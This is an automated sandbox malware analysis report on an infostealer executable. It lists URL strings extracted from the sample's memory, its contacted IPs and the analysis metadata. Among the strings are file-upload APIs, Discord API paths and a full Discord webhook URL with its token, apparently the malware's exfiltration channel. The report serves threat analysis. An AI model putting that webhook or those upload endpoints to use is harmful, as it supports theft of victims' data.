                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_moduleX9g8L63QGs.exe, 00000007.00000002.1693650050.000001E7C2780000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1279203002.000001E7C2569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachesX9g8L63QGs.exe, 00000007.00000002.1693650050.000001E7C2780000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.ecosia.org/newtab/X9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brX9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3983000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2FDE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1481477525.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1432565672.000001E7C29E9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2FD4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1431878807.000001E7C2FDE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1457946992.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445056949.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1454766245.000001E7C2FDE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1423636617.000001E7C2FD4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3A20000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445232213.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.youtube.com/X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://allegro.pl/X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3884000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000046.00000002.1499829000.0000017515DFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1695698107.000001E7C2EAE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1692076374.000001E7C2EBC000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1692121496.000001E7C2EAD000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691509541.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1695917994.000001E7C2EBD000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691987395.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syX9g8L63QGs.exe, 00000007.00000002.1692775608.000001E7C0B65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://MD8.mozilla.org/1/mX9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C3400000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://www.python.org/psf/license/X9g8L63QGs.exe, 00000007.00000002.1713477885.00007FFB0C724000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngp?sX9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.bbc.co.uk/X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://bugzilla.moX9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3884000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3840000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://github.com/python/importlib_metadata/wiki/Development-MethodologyX9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C3380000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://api.anonfiles.com/uploadrX9g8L63QGs.exe, 00000007.00000002.1694834714.000001E7C2C80000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1289606937.000001E7C2D42000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    http://tools.ietf.org/html/rfc6125#section-6.4.3X9g8L63QGs.exe, 00000007.00000002.1697474979.000001E7C32E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000014.00000002.1444673168.000002451BAEA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://google.com/mailX9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1462666866.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691353377.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691006091.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445882054.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1432565672.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1408663369.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1482149453.000001E7C29FF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694260601.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1450291264.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1456637981.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1593098042.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2DF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://packaging.python.org/specifications/entry-points/X9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C339C000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1697474979.000001E7C32E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://www.python.org/psf/license/)X9g8L63QGs.exe, 00000007.00000002.1713477885.00007FFB0C620000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyX9g8L63QGs.exe, 00000007.00000002.1692775608.000001E7C0B65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://www.google.com/X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C346C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://www.iqiyi.com/X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://foss.heptapod.net/pypy/pypy/-/issues/3539X9g8L63QGs.exe, 00000007.00000002.1697306895.000001E7C3180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.X9g8L63QGs.exe, 00000007.00000003.1462666866.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691006091.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445882054.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1432565672.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1408663369.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1482149453.000001E7C29FF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694260601.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1450291264.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1456637981.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1593098042.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://google.com/X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694834714.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691509541.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://ocsp.sectigo.com0X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://tools.ietf.org/html/rfc7231#section-4.3.6)X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2E3D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2E3D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691509541.000001E7C2E41000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2E3D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1290762711.000001E7C2DFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsNX9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1692076374.000001E7C2EBC000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1695917994.000001E7C2EBD000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691987395.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://contoso.com/Licensepowershell.exe, 00000046.00000002.1571908950.00000175246A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://discordapp.com/api/v9/users/X9g8L63QGs.exe, 00000007.00000002.1694449403.000001E7C2A80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourceX9g8L63QGs.exe, 00000007.00000003.1279178659.000001E7C2577000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1693137251.000001E7C24BC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=X9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specX9g8L63QGs.exe, 00000007.00000002.1693137251.000001E7C24BC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://github.com/urllib3/urllib3/issues/2920X9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C339C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_dataX9g8L63QGs.exe, 00000007.00000002.1692775608.000001E7C0B65000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1279178659.000001E7C2577000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://yahoo.com/X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1462666866.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691353377.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691006091.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445882054.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1432565672.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1408663369.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1482149453.000001E7C29FF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694260601.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1450291264.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1456637981.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1593098042.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2DF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://account.bellmedia.cX9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C38BC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6X9g8L63QGs.exe, 00000007.00000003.1291153468.000001E7C2E93000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1290762711.000001E7C2E8A000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694834714.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1290762711.000001E7C2DFE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691509541.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://login.microsoftonline.comX9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3898000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://cacerts.digicert.coX9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://crl.thawte.com/ThawteTimestampingCA.crl0X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://html.spec.whatwg.org/multipage/X9g8L63QGs.exe, 00000007.00000002.1694834714.000001E7C2D9A000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691509541.000001E7C2D99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://www.ifeng.com/X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsX9g8L63QGs.exe, 00000007.00000002.1697306895.000001E7C3180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://www.zhihu.com/X9g8L63QGs.exe, 00000007.00000003.1590666816.000001E7C3EBB000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1592523972.000001E7C3A8A000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1690170405.000001E7C3A89000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C38B4000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1709775944.000001E7C3A8A000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1590666816.000001E7C3EB4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C38D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchX9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://www.rfc-editor.org/rfc/rfc8259#section-8.1X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691353377.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://contoso.com/powershell.exe, 00000046.00000002.1571908950.00000175246A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://oneget.orgXpowershell.exe, 00000046.00000002.1499829000.0000017515C5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://api.gofile.io/getServerrzX9g8L63QGs.exe, 00000007.00000002.1694834714.000001E7C2C80000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1289606937.000001E7C2D42000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://crl.micrpowershell.exe, 00000014.00000002.1522920960.000002453402D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://discord.com/api/webhooks/1315377405426270278/HIGwvC-Zpfa8Zkb7aEYPMg-EuYuZPz1LJEfXefQjcA8JYgbX9g8L63QGs.exe, 00000007.00000002.1697306895.000001E7C3180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://api.gofile.io/getServerX9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngX9g8L63QGs.exe, 00000007.00000002.1709310873.000001E7C39E3000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      http://nuget.org/NuGet.exepowershell.exe, 00000014.00000002.1488439935.000002452B935000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1571908950.0000017524565000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1499829000.0000017515E59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1571908950.00000175246A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000046.00000002.1499829000.0000017515C5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high

                                                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                                                          Public IPs

                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                          208.95.112.1
                                                                                                                                                                                                                          		ip-api.comUnited States
                                                                                                                                                                                                                          		53334TUT-ASUSfalse
                                                                                                                                                                                                                          162.159.137.232
                                                                                                                                                                                                                          		discord.comUnited States
                                                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                                          General Information

                                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                          Analysis ID:1584308
                                                                                                                                                                                                                          Start date and time:2025-01-05 07:18:10 +01:00
                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                          Overall analysis duration:0h 12m 25s
                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                          Number of analysed new started processes analysed:119
                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                          Sample name:X9g8L63QGs.exe
                                                                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                                                                          Original Sample Name:006d680fdd592bcabb6ba965c61a82c2c97c1e30f5845984b5a5fb6b358316b4.exe
                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                          Classification:mal100.rans.troj.spyw.expl.evad.winEXE@176/56@4/2
                                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                                          • Successful, ratio: 50%
                                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                                          • Successful, ratio: 98%
                                                                                                                                                                                                                          • Number of executed functions: 85
                                                                                                                                                                                                                          • Number of non-executed functions: 188
                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                          • Found application associated with file extension: .exe

                                                                                                                                                                                                                          Warnings

                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 142.250.185.131, 13.107.246.45, 52.149.20.212
                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                          • Execution Graph export aborted for target mshta.exe, PID 7276 because there are no executed function
                                                                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 3920 because it is empty
                                                                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7296 because it is empty
                                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
